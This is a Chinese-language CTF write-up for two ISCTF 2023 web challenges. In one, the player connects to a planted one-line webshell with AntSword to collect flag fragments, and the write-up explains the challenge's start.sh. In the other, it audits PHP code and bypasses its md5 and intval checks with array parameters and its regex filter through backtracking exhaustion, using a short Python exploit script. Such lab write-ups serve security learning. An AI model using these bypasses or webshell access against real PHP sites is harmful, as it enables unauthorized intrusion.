23isctf
where_is_the_flag
1.打开环境,上面有一句话木马,直接蚁剑上
flag1:蚁剑连接上就可以直接看见,FLAG1:Yunxi{d0c0
flag2:在根目录下就有 797a-4697-
flag3: 在主页面有一个start.sh里面有提示信息
4dfe-9b48-50ff544c2273}
start.sh的内容
#!/bin/sh
sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php
echo ${FLAG:10:10} > /flag2
export FLAG3=${FLAG:20}
FLAG3=${FLAG:20}
export FLAG="flag"
FLAG="flag"
httpd -D FOREGROUND解释如下
sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php:这行命令使用sed(流编辑器)来处理/var/www/localhost/htdocs/flag.php文件。-i选项表示直接修改文件。s/{{FLAG1}}/${FLAG:0:10}/是sed的替换命令,它将文件中的{{FLAG1}}替换为环境变量FLAG的前10个字符。
echo ${FLAG:10:10} > /flag2:这行命令使用echo输出FLAG环境变量的第11到第20个字符(因为索引从0开始),并将输出重定向到/flag2文件。
export FLAG3=${FLAG:20}:这行命令将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3环境变量,并使用export命令使其在当前shell及其子进程中可用。
FLAG3=${FLAG:20}:这行命令与上一行类似,也是将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3变量,但没有使用export,所以这个变量只在当前shell中有效。
export FLAG="flag":这行命令将FLAG环境变量的值设置为字符串"flag",并使用export命令使其在当前shell及其子进程中可用打开终端,执行命令echo $FLAG3
绕进你的心里
1.代码审计
<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){ //数组绕过
echo "md5绕过了!";
if(preg_match("/[0-9]/", $num)){ //匹配数字
die('你干嘛?哎哟!');
}
elseif(intval($num)){ //匹配字符
if(preg_match('/.+?ISCTF/is', $str)){
die("再想想!");
}
if(stripos($str, '2023ISCTF') === false){
die("就差一点点啦!");
}
echo $flag;
}
}
?> 2.payload:后面两个数组绕过不解释了,解释一下前面的绕过
?zhurong[]=1&hongmeng[]=2&shennong[]=3
第二层,绕过intval()限制,数字绕过
intval() 转换数组类型时,不关心数组中的内容,只判断数组中有没有元素。
「空数组」返回 0
「非空数组」返回 1
3.intval()限制字符绕过
第三层的绕过关键在pan_gu利用正则最大回溯绕过,看到'/.+?ISCTF/is'这种就要想到了,我们通过发送超长字符串的方式,使正则执行失败,最后绕过目标对PHP语言的限制。
网上找的通用回溯poc如下,需要对应不同题目改脚本:
import requests
url = "http://172.16.17.201:50125/?zhurong[]=1&hongmeng[]=2&shennong[]=3"
data = {
'pan_gu': 'aaaaaaaaaa' * 250000 + '2023ISCTF'
}
r = requests.post(url, data=data)
print(r.text)